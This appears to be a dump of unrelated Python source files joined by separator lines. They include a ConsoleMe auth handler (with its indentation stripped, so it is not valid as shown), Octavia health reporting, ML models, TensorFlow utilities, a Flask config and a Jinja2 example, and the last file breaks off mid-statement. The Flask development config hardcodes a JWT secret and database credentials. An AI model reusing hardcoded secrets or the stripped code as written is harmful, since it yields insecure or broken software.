# Set Per-User Role Name (This logic is not used in OSS deployment)
if (
config.get("user_roles.opt_in_group")
and config.get("user_roles.opt_in_group") in self.groups
):
# Get or create user_role_name attribute
self.user_role_name = await auth.get_or_create_user_role_name(self.user)
self.eligible_roles = await group_mapping.get_eligible_roles(
self.user, self.groups, self.user_role_name, console_only=console_only
)
if not self.eligible_roles:
log_data[
"message"
] = "No eligible roles detected for user. But letting them continue"
log.warning(log_data)
log_data["eligible_roles"] = len(self.eligible_roles)
if not self.eligible_accounts:
try:
self.eligible_accounts = await group_mapping.get_eligible_accounts(
self.eligible_roles
)
log_data["eligible_accounts"] = len(self.eligible_accounts)
log_data["message"] = "Successfully authorized user."
log.debug(log_data)
except Exception:
stats.count("Basehandler.authorization_flow.exception")
log.error(log_data, exc_info=True)
raise
if (
config.get("auth.cache_user_info_server_side", True)
and self.groups
# Only set role cache if we didn't retrieve user's existing roles from cache
and not refreshed_user_roles_from_cache
):
try:
self.red.setex(
f"USER-{self.user}-CONSOLE-{console_only}",
config.get("dynamic_config.role_cache.cache_expiration", 60),
json.dumps(
{
"groups": self.groups,
"eligible_roles": self.eligible_roles,
"eligible_accounts": self.eligible_accounts,
"user_role_name": self.user_role_name,
}
),
)
except redis.exceptions.ConnectionError:
pass
if (
config.get("auth.set_auth_cookie")
and config.get("auth_cookie_name", "consoleme_auth")
and not self.get_cookie(config.get("auth_cookie_name", "consoleme_auth"))
):
expiration = datetime.utcnow().replace(tzinfo=pytz.UTC) + timedelta(
minutes=config.get("jwt.expiration_minutes", 60)
)
encoded_cookie = await generate_jwt_token(
self.user, self.groups, exp=expiration
)
self.set_cookie(
config.get("auth_cookie_name", "consoleme_auth"),
encoded_cookie,
expires=expiration,
secure=config.get(
"auth.cookie.secure",
"https://" in config.get("url"),
),
httponly=config.get("auth.cookie.httponly", True),
samesite=config.get("auth.cookie.samesite", True),
)
if self.tracer:
await self.tracer.set_additional_tags({"USER": self.user})
class BaseAPIV1Handler(BaseHandler):
"""Default API Handler for api/v1/* routes."""
def set_default_headers(self) -> None:
self.set_header("Content-Type", "application/json")
class BaseAPIV2Handler(BaseHandler):
"""Default API Handler for api/v2/* routes."""
def set_default_headers(self) -> None:
self.set_header("Content-Type", "application/json")
def write_error(self, status_code: int, **kwargs: Any) -> None:
if self.settings.get("serve_traceback") and "exc_info" in kwargs:
# in debug mode, try to send a traceback
self.set_header("Content-Type", "text/plain")
self.set_status(status_code)
for line in traceback.format_exception(*kwargs["exc_info"]):
self.write(line)
self.finish()
else:
self.set_header("Content-Type", "application/problem+json")
title = httputil.responses.get(status_code, "Unknown")
message = kwargs.get("message", self._reason)
# self.set_status() modifies self._reason, so this call should come after we grab the reason
self.set_status(status_code)
self.finish(
json.dumps(
{"status": status_code, "title": title, "message": message}
) # noqa
)
class BaseMtlsHandler(BaseAPIV2Handler):
def initialize(self, **kwargs):
self.kwargs = kwargs
async def prepare(self):
self.tracer = None
self.span = None
self.spans = {}
self.responses = []
self.request_uuid = str(uuid.uuid4())
self.auth_cookie_expiration = 0
stats.timer("base_handler.incoming_request")
if config.get("auth.require_mtls", False):
try:
await auth.validate_certificate(self.request.headers)
except InvalidCertificateException:
stats.count(
"GetCredentialsHandler.post.invalid_certificate_header_value"
)
self.set_status(403)
self.write({"code": "403", "message": "Invalid Certificate"})
await self.finish()
return
# Extract user from valid certificate
try:
self.requester = await auth.extract_user_from_certificate(
self.request.headers
)
self.current_cert_age = await auth.get_cert_age_seconds(
self.request.headers
)
except (MissingCertificateException, Exception) as e:
if isinstance(e, MissingCertificateException):
stats.count("BaseMtlsHandler.post.missing_certificate_header")
message = "Missing Certificate in Header."
else:
stats.count("BaseMtlsHandler.post.exception")
message = f"Invalid Mtls Certificate: {e}"
self.set_status(400)
self.write({"code": "400", "message": message})
await self.finish()
return
elif config.get("auth.require_jwt", True):
# Check to see if user has a valid auth cookie
if config.get("auth_cookie_name", "consoleme_auth"):
auth_cookie = self.get_cookie(
config.get("auth_cookie_name", "consoleme_auth")
)
if auth_cookie:
res = await validate_and_return_jwt_token(auth_cookie)
if not res:
error = {
"code": "invalid_jwt",
"message": "JWT is invalid or has expired.",
"request_id": self.request_uuid,
}
self.set_status(403)
self.write(error)
                        await self.finish()
                        return
self.user = res.get("user")
self.groups = res.get("groups")
self.requester = {"type": "user", "email": self.user}
self.current_cert_age = int(time.time()) - res.get("iat")
self.auth_cookie_expiration = res.get("exp")
else:
raise MissingConfigurationValue(
"Auth cookie name is not defined in configuration."
)
else:
raise MissingConfigurationValue("Unsupported authentication scheme.")
if not hasattr(self, "requester"):
raise tornado.web.HTTPError(403, "Unable to authenticate user.")
self.ip = self.get_request_ip()
await self.configure_tracing()
def write(self, chunk: Union[str, bytes, dict]) -> None:
if config.get("_security_risk_full_debugging.enabled"):
self.responses.append(chunk)
super(BaseMtlsHandler, self).write(chunk)
def on_finish(self) -> None:
if config.get("_security_risk_full_debugging.enabled"):
request_details = {
"path": self.request.path,
"method": self.request.method,
"body": self.request.body,
"arguments": self.request.arguments,
"body_arguments": self.request.body_arguments,
"headers": dict(self.request.headers.items()),
"query": self.request.query,
"query_arguments": self.request.query_arguments,
"uri": self.request.uri,
"cookies": dict(self.request.cookies.items()),
"response": self.responses,
}
with open(config.get("_security_risk_full_debugging.file"), "a+") as f:
f.write(json.dumps(request_details, reject_bytes=False))
super(BaseMtlsHandler, self).on_finish()
class NoCacheStaticFileHandler(tornado.web.StaticFileHandler):
def set_default_headers(self) -> None:
self.set_header(
"Cache-Control", "no-store, no-cache, must-revalidate, max-age=0"
)
|
py | b41114286852baab6d9887a984c97c9515366343 | from .types import HotWaterSystem, ClimateSystem, VentilationSystem
MAX_REQUEST_PARAMETERS = 15
PARAM_HOTWATER_SYSTEMS = {
"1": HotWaterSystem(
"Hot Water",
40014,
40013,
47041,
47387,
47050,
47048,
47044,
47047,
47043,
47049,
47045,
43424,
"hot_water_boost",
),
"DEW": HotWaterSystem(
"Hot Water (DEW)",
40077,
40078,
47041,
47555,
47050,
47048,
47044,
47047,
47043,
47049,
47045,
43424,
"hot_water_boost",
),
"SCA": HotWaterSystem(
"Hot Water (SCA)",
40077,
40078,
47041,
49224,
47050,
47048,
47044,
47047,
47043,
47049,
47045,
43424,
"hot_water_boost",
),
"AHPS": HotWaterSystem(
"Hot Water (AHPS)",
40077,
40078,
47041,
48641,
47050,
47048,
47044,
47047,
47043,
47049,
47045,
43424,
"hot_water_boost",
),
}
PARAM_CLIMATE_SYSTEMS = {
# BT3 BT2 CSTH OC BT50 RSH RSC URS AA EAA CSTC OH HC MIS MAS HP # noqa: 501
"1": ClimateSystem(
"S1",
40012,
40008,
43009,
48739,
40033,
47398,
48785,
47394,
None,
43161,
44270,
47011,
47007,
47015,
47016,
None,
), # noqa: 501
"2": ClimateSystem(
"S2",
40129,
40007,
43008,
48738,
40032,
47397,
48784,
47393,
47302,
43160,
44269,
47010,
47006,
47014,
47017,
44746,
), # noqa: 501
"3": ClimateSystem(
"S3",
40128,
40006,
43007,
48737,
40031,
47396,
48783,
47392,
47303,
43159,
44268,
47009,
47005,
47013,
47018,
44745,
), # noqa: 501
"4": ClimateSystem(
"S4",
40127,
40005,
43006,
48736,
40030,
47395,
48782,
47391,
47304,
43158,
44267,
47008,
47004,
47012,
47019,
44744,
), # noqa: 501
}
PARAM_VENTILATION_SYSTEMS = {
"1": VentilationSystem(
"Ventilation",
10001,
40025,
40026,
47265,
47264,
47263,
47262,
47261,
"ventilation_boost",
)
}
PARAM_PUMP_SPEED_HEATING_MEDIUM = 43437
PARAM_COMPRESSOR_FREQUENCY = 43136
PARAM_STATUS_COOLING = 43024
SMARTHOME_MODES = {
0: "DEFAULT_OPERATION",
1: "AWAY_FROM_HOME",
2: "VACATION",
}
|
py | b4111444ae45e8f334eb59548753846a2a39d4d6 | import os
import numpy as np
import theano.tensor as T
import theano
from scipy import misc
from autoencoder import Autoencoder
from transform import *
from scene import *
from shader import *
from optimize import *
if not os.path.exists('output'):
os.makedirs('output')
#train_data = np.array([misc.imread('example.png').flatten()], dtype='float32')/255.0
train_data = np.asarray([misc.imread('15.png').flatten()], dtype='float32')/255.0
N,D = train_data.shape
img_sz = int(np.sqrt(D))
def scene(capsules, obj_params):
shapes = []
    # TODO: move the material information to an attribute of the capsule instance
material1 = Material((0.2, 0.9, 0.4), 0.3, 0.7, 0.5, 50.)
for i in xrange(len(capsules)):
capsule = capsules[i]
obj_param = obj_params[i]
t1 = translate(obj_param[:3]) * scale(obj_param[3:])
if capsule.name == 'sphere':
shapes.append(Sphere(t1, material1))
elif capsule.name == 'square':
shapes.append(Square(t1, material1))
elif capsule.name == 'light':
shapes.append(Light(t1, material1))
light = Light((-1., -1., 2.), (0.961, 1., 0.87))
camera = Camera(img_sz, img_sz)
#shader = PhongShader()
shader = DepthMapShader(6.1)
scene = Scene(shapes, [light], camera, shader)
return scene.build()
#Hyper-parameters
num_capsule = 2
epsilon = 0.0001
num_epoch = 200
ae = Autoencoder(scene, D, 300, 30, 10, num_capsule)
opt = MGDAutoOptimizer(ae)
train_ae = opt.optimize(train_data)
get_recon = theano.function([], ae.get_reconstruct(train_data[0])[:,:,0])
get_center= theano.function([], ae.encoder(train_data[0]))
recon = get_recon()
center = get_center()[0]
misc.imsave('output/test_balls0.png', recon)
print '...Initial center1 (%g,%g,%g)' % (center[0], center[1], center[2])
print recon.sum()
n = 0
while (n<num_epoch):
n+=1
eps = get_epsilon(epsilon, num_epoch, n)
train_loss = train_ae(eps)
center = get_center()[0]
print '...Epoch %d Train loss %g, Center (%g, %g, %g)' \
% (n, train_loss, center[0], center[1], center[2])
if n % 10 ==0:
image = get_recon()
        misc.imsave('output/test_balls%d.png' % (n,), image)
|
py | b41114d36c09cb5798cfc8c84f7efdd6c1848120 | #! /usr/bin/env python
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import os
import time
from oslo_config import cfg
from oslo_log import log as logging
import six
from octavia.amphorae.backends.agent.api_server import util
from octavia.amphorae.backends.health_daemon import health_sender
from octavia.amphorae.backends.utils import haproxy_query
from octavia.amphorae.backends.utils import keepalivedlvs_query
if six.PY2:
import Queue as queue # pylint: disable=wrong-import-order
else:
import queue # pylint: disable=wrong-import-order
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
SEQ = 0
# MSG_VER is an incrementing integer heartbeat message format version
# this allows for backward compatibility when the amphora-agent is older
# than the controller version and the message format has backwards
# incompatible changes.
#
# ver 1 - Adds UDP listener status when no pool or members are present
#
MSG_VER = 1
def list_sock_stat_files(hadir=None):
stat_sock_files = {}
if hadir is None:
hadir = CONF.haproxy_amphora.base_path
listener_ids = util.get_listeners()
for listener_id in listener_ids:
sock_file = listener_id + ".sock"
stat_sock_files[listener_id] = os.path.join(hadir, sock_file)
return stat_sock_files
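# For reference, the mapping built above looks roughly like
# {'<listener-id>': '<base_path>/<listener-id>.sock'}, where base_path comes from
# CONF.haproxy_amphora.base_path (illustrative placeholders, not literal values).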
def run_sender(cmd_queue):
LOG.info('Health Manager Sender starting.')
sender = health_sender.UDPStatusSender()
keepalived_cfg_path = util.keepalived_cfg_path()
keepalived_pid_path = util.keepalived_pid_path()
while True:
try:
# If the keepalived config file is present check
# that it is running, otherwise don't send the health
# heartbeat
if os.path.isfile(keepalived_cfg_path):
# Is there a pid file for keepalived?
with open(keepalived_pid_path, 'r') as pid_file:
pid = int(pid_file.readline())
os.kill(pid, 0)
message = build_stats_message()
sender.dosend(message)
except IOError as e:
# Missing PID file, skip health heartbeat
if e.errno == errno.ENOENT:
LOG.error('Missing keepalived PID file %s, skipping health '
'heartbeat.', keepalived_pid_path)
else:
LOG.error('Failed to check keepalived and haproxy status due '
'to exception %s, skipping health heartbeat.', e)
except OSError as e:
# Keepalived is not running, skip health heartbeat
if e.errno == errno.ESRCH:
LOG.error('Keepalived is configured but not running, '
'skipping health heartbeat.')
else:
LOG.error('Failed to check keepalived and haproxy status due '
'to exception %s, skipping health heartbeat.', e)
except Exception as e:
LOG.error('Failed to check keepalived and haproxy status due to '
'exception %s, skipping health heartbeat.', e)
try:
cmd = cmd_queue.get_nowait()
if cmd == 'reload':
LOG.info('Reloading configuration')
CONF.reload_config_files()
elif cmd == 'shutdown':
LOG.info('Health Manager Sender shutting down.')
break
except queue.Empty:
pass
time.sleep(CONF.health_manager.heartbeat_interval)
def get_stats(stat_sock_file):
stats_query = haproxy_query.HAProxyQuery(stat_sock_file)
stats = stats_query.show_stat()
pool_status = stats_query.get_pool_status()
return stats, pool_status
def build_stats_message():
global SEQ
msg = {'id': CONF.amphora_agent.amphora_id,
'seq': SEQ, "listeners": {},
'ver': MSG_VER}
SEQ += 1
stat_sock_files = list_sock_stat_files()
for listener_id, stat_sock_file in stat_sock_files.items():
listener_dict = {'pools': {},
'status': 'DOWN',
'stats': {
'tx': 0,
'rx': 0,
'conns': 0,
'totconns': 0,
'ereq': 0}}
msg['listeners'][listener_id] = listener_dict
if util.is_listener_running(listener_id):
(stats, pool_status) = get_stats(stat_sock_file)
listener_dict = msg['listeners'][listener_id]
for row in stats:
if row['svname'] == 'FRONTEND':
listener_dict['stats']['tx'] = int(row['bout'])
listener_dict['stats']['rx'] = int(row['bin'])
listener_dict['stats']['conns'] = int(row['scur'])
listener_dict['stats']['totconns'] = int(row['stot'])
listener_dict['stats']['ereq'] = int(row['ereq'])
listener_dict['status'] = row['status']
for oid, pool in pool_status.items():
if oid != listener_id:
pool_id = oid
pools = listener_dict['pools']
pools[pool_id] = {"status": pool['status'],
"members": pool['members']}
# UDP listener part
udp_listener_ids = util.get_udp_listeners()
if udp_listener_ids:
listeners_stats = keepalivedlvs_query.get_udp_listeners_stats()
if listeners_stats:
for listener_id, listener_stats in listeners_stats.items():
pool_status = keepalivedlvs_query.get_udp_listener_pool_status(
listener_id)
udp_listener_dict = dict()
udp_listener_dict['status'] = listener_stats['status']
udp_listener_dict['stats'] = {
'tx': listener_stats['stats']['bout'],
'rx': listener_stats['stats']['bin'],
'conns': listener_stats['stats']['scur'],
'totconns': listener_stats['stats']['stot'],
'ereq': listener_stats['stats']['ereq']
}
udp_listener_dict['pools'] = {}
if pool_status:
udp_listener_dict['pools'] = {
pool_status['lvs']['uuid']: {
"status": pool_status['lvs']['status'],
"members": pool_status['lvs']['members']}}
msg['listeners'][listener_id] = udp_listener_dict
return msg
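# For reference, the heartbeat message assembled above has roughly this shape (values illustrative):
# {
#     'id': '<amphora-id>', 'seq': 0, 'ver': 1,
#     'listeners': {
#         '<listener-id>': {
#             'status': 'OPEN',
#             'pools': {'<pool-id>': {'status': 'UP', 'members': {...}}},
#             'stats': {'tx': 0, 'rx': 0, 'conns': 0, 'totconns': 0, 'ereq': 0},
#         }
#     },
# }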
|
py | b4111520f13f6e906a35b204b657729d82d70457 | import torch
from torch import nn
from typing import Tuple, Dict
from src.nlp import abstract_embeddings
from src.models import abstract_preprocessor
from src.utils import registry, vocab
from src.datasets.hanitem import HANItem
from src.datasets.han_dataset import HANDataset
from src.datasets.bert_han_dataset import BERTHANDataset
@registry.register('model', 'HAN')
class HANModel(torch.nn.Module):
class Preprocessor(abstract_preprocessor.AbstractPreproc):
def __init__(self, preprocessor):
super().__init__()
self.preprocessor: abstract_preprocessor.AbstractPreproc = registry.instantiate(
callable=registry.lookup("preprocessor", preprocessor["name"]),
config=preprocessor,
unused_keys=("name", "final_layer_dim", "final_layer_dropout")
)
def get_vocab(self) -> vocab.Vocab:
return self.preprocessor.get_vocab()
def get_dataset_size(self, section: str) -> int:
return self.preprocessor.get_dataset_size(section)
def get_embedder(self) -> abstract_embeddings.Embedder:
            return self.preprocessor.get_embedder()
def get_num_classes(self) -> int:
return self.preprocessor.get_num_classes()
def get_max_doc_length(self) -> int:
return self.preprocessor.get_max_doc_length()
def get_max_sent_length(self) -> int:
return self.preprocessor.get_max_sent_length()
def validate_item(self, item: HANItem, section: str) -> Tuple[bool, str]:
item_result, validation_info = self.preprocessor.validate_item(item, section)
return item_result, validation_info
def add_item(self, item: HANItem, section: str, validation_info: str):
self.preprocessor.add_item(item, section, validation_info)
def clear_items(self) -> None:
self.preprocessor.clear_items()
def save(self) -> None:
self.preprocessor.save()
def load(self) -> None:
self.preprocessor.load()
def label_to_id_map(self) -> Dict:
return self.preprocessor.label_to_id_map()
def dataset(self, section):
print(f"Loading dataset of section: {section}")
if "bert" in str(type(self.preprocessor)).lower(): # check if it's BERT-based model or not
return BERTHANDataset(
self.preprocessor.dataset(section),
self.label_to_id_map(),
self.get_max_sent_length(),
self.get_max_doc_length(),
self.get_num_classes(),
self.get_dataset_size(section),
self.get_tokenizer(),
)
return HANDataset(
self.preprocessor.dataset(section),
self.label_to_id_map(),
self.get_vocab(),
self.get_max_sent_length(),
self.get_max_doc_length(),
self.get_num_classes(),
self.get_dataset_size(section),
)
def get_tokenizer(self):
return self.preprocessor.get_tokenizer()
def create_validation_set(self, val_split: float, path: str) -> None:
self.preprocessor.create_validation_set(val_split, path)
def __init__(self, preprocessor, device, word_attention, sentence_attention, final_layer_dim, final_layer_dropout):
super().__init__()
self.preprocessor = preprocessor
self.word_attention = registry.instantiate(
callable=registry.lookup("word_attention", word_attention["name"]),
config=word_attention,
unused_keys=("name",),
device=device,
preprocessor=preprocessor.preprocessor
)
self.sentence_attention = registry.instantiate(
callable=registry.lookup("sentence_attention", sentence_attention["name"]),
config=sentence_attention,
unused_keys=("name",),
device=device,
)
self.mlp = nn.Sequential(
torch.nn.Linear(
self.sentence_attention.recurrent_size, final_layer_dim
), nn.ReLU(), nn.Dropout(final_layer_dropout),
torch.nn.Linear(final_layer_dim, self.preprocessor.get_num_classes())
)
self.loss = nn.CrossEntropyLoss(reduction="mean").to(device)
def forward(self, docs, doc_lengths, sent_lengths, labels=None, attention_masks=None, token_type_ids=None):
"""
:param docs: encoded document-level data; LongTensor (num_docs, padded_doc_length, padded_sent_length)
:param doc_lengths: unpadded document lengths; LongTensor (num_docs)
:param sent_lengths: unpadded sentence lengths; LongTensor (num_docs, max_sent_len)
:param labels: labels; LongTensor (num_docs)
:param attention_masks: BERT attention masks; LongTensor (num_docs, padded_doc_length, padded_sent_length)
:param token_type_ids: BERT token type IDs; LongTensor (num_docs, padded_doc_length, padded_sent_length)
:return: class scores, attention weights of words, attention weights of sentences, loss
"""
# get sentence embedding for each sentence by passing it in the word attention model
if attention_masks is not None and token_type_ids is not None:
sent_embeddings, doc_perm_idx, docs_valid_bsz, word_att_weights = self.word_attention(
docs, doc_lengths, sent_lengths, attention_masks, token_type_ids
)
else:
sent_embeddings, doc_perm_idx, docs_valid_bsz, word_att_weights = self.word_attention(
docs, doc_lengths, sent_lengths
)
# get document embedding for each document by passing the sentence embeddings in the sentence attention model
doc_embeds, word_att_weights, sentence_att_weights = self.sentence_attention(
sent_embeddings, doc_perm_idx, docs_valid_bsz, word_att_weights
)
scores = self.mlp(doc_embeds)
outputs = (scores, word_att_weights, sentence_att_weights,)
if labels is not None:
loss = self.loss(scores, labels)
return outputs + (loss,)
return outputs
|
py | b4111525f04322c540d8cced475e4b0dd024a92d | import numpy as np
import tensorflow as tf
from tensorflow.python.ops import control_flow_ops
slim = tf.contrib.slim
def im2uint8(x):
if x.__class__ == tf.Tensor:
return tf.cast(tf.clip_by_value(x, 0.0, 1.0) * 255.0, tf.uint8)
else:
t = np.clip(x, 0.0, 1.0) * 255.0
return t.astype(np.uint8)
def get_shape(x):
shape = tf.shape(x)
check = tf.Assert(tf.reduce_all(shape >= 0), ["EASYFLOW: Need value.shape >= 0, got ", shape])
shape = control_flow_ops.with_dependencies([check], shape)
return [shape[i] for i in range(shape.shape.as_list()[0])]
def zero_upsampling(x, scale_factor):
dims = x.get_shape().as_list()
if len(dims) == 5:
n, t, h, w, c = dims
y = tf.concat([x] + [tf.zeros_like(x)] * (scale_factor ** 2 - 1), -1)
y = tf.reshape(y, [n, t, h, w, scale_factor, scale_factor, c])
y = tf.transpose(y, [0, 1, 2, 4, 3, 5, 6])
y = tf.reshape(y, [n, t, h * scale_factor, w * scale_factor, c])
elif len(dims) == 4:
n, h, w, c = dims
y = tf.concat([x] + [tf.zeros_like(x)] * (scale_factor ** 2 - 1), -1)
y = tf.reshape(y, [n, h, w, scale_factor, scale_factor, c])
y = tf.transpose(y, [0, 1, 3, 2, 4, 5])
y = tf.reshape(y, [n, h * scale_factor, w * scale_factor, c])
return y
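# zero_upsampling above enlarges each spatial dimension by scale_factor: every input pixel
# lands in the top-left corner of a scale_factor x scale_factor block whose remaining entries
# are zeros (a zero-filled counterpart of depth-to-space upsampling).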
def leaky_relu(x, alpha=0.1):
return tf.maximum(x, alpha * x)
def prelu(x):
alphas = tf.get_variable('alpha', x.get_shape()[-1],
initializer=tf.constant_initializer(0.0),
dtype=tf.float32)
pos = tf.nn.relu(x)
neg = alphas * (x - tf.abs(x)) * 0.5
return pos + neg
def display_tf_variables(train_vars):
print ('Training Variables: ')
for var in train_vars:
print ('\t', var.name)
def resize_images(images, size, method=2, align_corners=False):
dims = len(images.get_shape())
if dims == 5:
n, t, h, w, c = images.get_shape().as_list()
images = tf.reshape(images, [n * t, h, w, c])
images = tf.image.resize_images(images, size, method, align_corners)
if dims == 5:
images = tf.reshape(images, [n, t, size[0], size[1], c])
return images
def rgb2y(inputs):
with tf.name_scope('rgb2y'):
if inputs.get_shape()[-1].value == 1:
return inputs
assert inputs.get_shape()[-1].value == 3, 'Error: rgb2y input should be RGB or grayscale!'
dims = len(inputs.get_shape())
if dims == 4:
scale = tf.reshape([65.481, 128.553, 24.966], [1, 1, 1, 3]) / 255.0
elif dims == 5:
scale = tf.reshape([65.481, 128.553, 24.966], [1, 1, 1, 1, 3]) / 255.0
output = tf.reduce_sum(inputs * scale, reduction_indices=dims - 1, keep_dims=True)
output = output + 16 / 255.0
return output
def rgb2ycbcr(inputs):
with tf.name_scope('rgb2ycbcr'):
if inputs.get_shape()[-1].value == 1:
return inputs
assert inputs.get_shape()[-1].value == 3, 'Error: rgb2ycbcr input should be RGB or grayscale!'
ndims = len(inputs.get_shape())
origT = [[65.481, 128.553, 24.966], [-37.797, -74.203, 112], [112, -93.786, -18.214]]
origOffset = [16.0, 128.0, 128.0]
if ndims == 4:
origT = [tf.reshape(origT[i], [1, 1, 1, 3]) / 255.0 for i in range(3)]
elif ndims == 5:
origT = [tf.reshape(origT[i], [1, 1, 1, 1, 3]) / 255.0 for i in range(3)]
output = []
for i in range(3):
output.append(tf.reduce_sum(inputs * origT[i], reduction_indices=-1, keep_dims=True) + origOffset[i] / 255.0)
return tf.concat(output, -1)
def ycbcr2rgb(inputs):
with tf.name_scope('ycbcr2rgb'):
if inputs.get_shape()[-1].value == 1:
return inputs
assert inputs.get_shape()[-1].value == 3, 'Error: rgb2ycbcr input should be RGB or grayscale!'
ndims = len(inputs.get_shape())
# origT = np.array([[65.481, 128.553, 24.966], [-37.797 -74.203 112], [112 -93.786 -18.214]])
# T = tf.inv(origT)
Tinv = [[0.00456621, 0., 0.00625893], [0.00456621, -0.00153632, -0.00318811], [0.00456621, 0.00791071, 0.]]
origOffset = [16.0, 128.0, 128.0]
if ndims == 4:
origT = [tf.reshape(Tinv[i], [1, 1, 1, 3]) * 255.0 for i in range(3)]
origOffset = tf.reshape(origOffset, [1, 1, 1, 3]) / 255.0
elif ndims == 5:
origT = [tf.reshape(Tinv[i], [1, 1, 1, 1, 3]) * 255.0 for i in range(3)]
origOffset = tf.reshape(origOffset, [1, 1, 1, 1, 3]) / 255.0
output = []
for i in range(3):
output.append(tf.reduce_sum((inputs - origOffset) * origT[i], reduction_indices=-1, keep_dims=True))
return tf.concat(output, -1)
def rgb2gray(inputs):
with tf.name_scope('rgb2gray'):
if inputs.get_shape()[-1].value == 1:
return inputs
assert inputs.get_shape()[-1].value == 3, 'Error: rgb2y input should be RGB or grayscale!'
dims = len(inputs.get_shape())
if dims == 4:
scale = tf.reshape([0.299, 0.587, 0.114], [1, 1, 1, 3])
elif dims == 5:
scale = tf.reshape([0.299, 0.587, 0.114], [1, 1, 1, 1, 3])
output = tf.reduce_sum(inputs * scale, reduction_indices=dims - 1, keep_dims=True)
return output
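# Note: rgb2y/rgb2ycbcr use the studio-swing ITU-R BT.601 constants (the same values MATLAB's
# rgb2ycbcr uses), while rgb2gray uses the full-range BT.601 luma weights 0.299/0.587/0.114.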
|
py | b41115adb98f5f1d3092bef70e248669408bc1eb | # -*- coding: utf-8 -*-
import os
class BaseConfig:
DEBUG = False
TESTING = False
PROJECT_ROOT = os.path.abspath('.')
SQLALCHEMY_DATABASE_URI = f'sqlite:///{os.path.join(PROJECT_ROOT, "db.sqlite")}'
SQLALCHEMY_TRACK_MODIFICATIONS = False
JWT_SECRET_KEY = os.urandom(32)
JWT_IDENTITY_CLAIM = 'sub'
JWT_ERROR_MESSAGE_KEY = 'error'
JWT_HEADER_TYPE = 'JWT'
class DevelopmentConfig(BaseConfig):
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'postgres://postgres:postgres@db:5432/evolux_challenge'
JWT_SECRET_KEY = 'mysupersecretkey'
class TestingConfig(BaseConfig):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite://'
class ProductionConfig(BaseConfig):
SQLALCHEMY_DATABASE_URI = os.getenv('SQLALCHEMY_DATABASE_URI')
JWT_SECRET_KEY = os.getenv('JWT_SECRET_KEY')
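# Illustrative wiring, not part of the original module: an app factory could select one of the
# classes above by environment name (the `config_by_name` helper below is an assumption) and
# load it with app.config.from_object(config_by_name[os.getenv('FLASK_ENV', 'development')]).
config_by_name = {
    'development': DevelopmentConfig,
    'testing': TestingConfig,
    'production': ProductionConfig,
}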
|
py | b411173eb64d98d18c4482d60dd8975b4b095961 | import tkinter as tk
class Seekbar(tk.Canvas):
def __init__(self, parent, **options):
tk.Canvas.__init__(self, parent, options)
self.parent = parent
self.width = options['width']
self.red_rectangle = self.create_rectangle(0, 0, 0, 0, fill="red")
self.seekbar_knob_image = tk.PhotoImage(file="../icons/seekbar_knob.gif")
self.seekbar_knob = self.create_image(
0, 0, image=self.seekbar_knob_image)
self.bind_mouse_button()
def bind_mouse_button(self):
self.bind('<Button-1>', self.on_seekbar_clicked)
self.bind('<B1-Motion>', self.on_seekbar_clicked)
self.tag_bind(
self.red_rectangle, '<B1-Motion>', self.on_seekbar_clicked)
self.tag_bind(
self.seekbar_knob, '<B1-Motion>', self.on_seekbar_clicked)
def on_seekbar_clicked(self, event=None):
if event.x > 0 and event.x < self.width:
self.slide_to_position(event.x)
def slide_to_position(self, new_position):
self.coords(self.red_rectangle, 0, 0, new_position, new_position)
self.coords(self.seekbar_knob, new_position, 0)
self.event_generate("<<SeekbarPositionChanged>>", x=new_position)
class TestSeekBar():
def __init__(self):
root = tk.Tk()
root.bind("<<SeekbarPositionChanged>>", self.seek_new_position)
frame = tk.Frame(root)
frame.grid(row=1, pady=10, padx=10)
c = Seekbar(
frame, background="blue", width=360, height=10)
c.grid(row=2, columnspan=10, sticky='ew', padx=5)
root.mainloop()
def seek_new_position(self, event):
print("Dragged to x:", event.x)
if __name__ == '__main__':
TestSeekBar()
|
py | b4111920cd9d6f39b9f0f7f2cdb5ed85cdc876d3 | from __future__ import unicode_literals, print_function
from jinja2 import FileSystemLoader, StrictUndefined
from jinja2.environment import Environment
'''
>> nxos_bgp_include.j2 <<
feature bgp
router bgp {{ local_as }}
{% include 'bgp_ipv4_routes.j2' %} {# appends a separate FILE's content on this place #}
neighbor {{ peer1_ip }} remote-as {{ peer1_as }}
update-source loop1
ebgp-multihop 2
address-family ipv4 unicast
!
{%- include eigrp_template %} {# eigrp_template is a VARIABLE defined in the dictionary #}
>> bgp_ipv4_routes.j2 <<
address-family ipv4 unicast
network {{ advertised_route1 }}
network {{ advertised_route2 }}
network {{ advertised_route3 }}
>> eigrp_template1.j2 <<
router eigrp 1
!
address-family ipv4 vrf CORP
network 10.115.79.49 0.0.0.0
network 10.115.79.170 0.0.0.0
network 10.115.79.174 0.0.0.0
!
network 10.115.68.0 0.0.0.255
network 10.115.78.0 0.0.0.255
passive-interface default
no passive-interface Vlan920
no passive-interface Vlan921
autonomous-system 1
eigrp router-id 10.115.79.49
eigrp stub connected summary
nsf
exit-address-family
!
'''
env = Environment(undefined=StrictUndefined) # CREATE ENVIRONMENT: StrictUndefined means every {{ variable }} in the template
                                             # must have a value defined somewhere in the code; otherwise rendering fails.
                                             # If you don't need that strict behavior (a variable may be missing), use just "env = Environment()".
env.loader = FileSystemLoader('.') # TEMPLATE LOCATION: defines where templates are loaded from.
                                   # In this case '.' means the current working directory.
bgp_vars = {
'hostname' : 'test-rt1',
'local_as' : '10',
'peer1_ip' : '10.255.255.2',
'peer1_as' : '20',
'advertised_route1' : '10.10.200.0/24',
'advertised_route2' : '10.10.201.0/24',
'advertised_route3' : '10.10.202.0/24',
'eigrp_template' : 'eigrp_template1.j2',
}
template_file = 'nxos_bgp_include.j2' # name of the template file
template = env.get_template(template_file) # load the template file to the environment
output = template.render(**bgp_vars) # loads all attributes from dictionary intf_vars
print (output) |
py | b41119a300129f71807aabcfc623f9dd78c1f1a5 | from django.contrib.contenttypes.models import ContentType
from django.core.paginator import Paginator
from django.http import Http404
from django.template.response import TemplateResponse
from wagtail.core.models import Page
def content_type_use(request, content_type_app_name, content_type_model_name):
try:
content_type = ContentType.objects.get_by_natural_key(
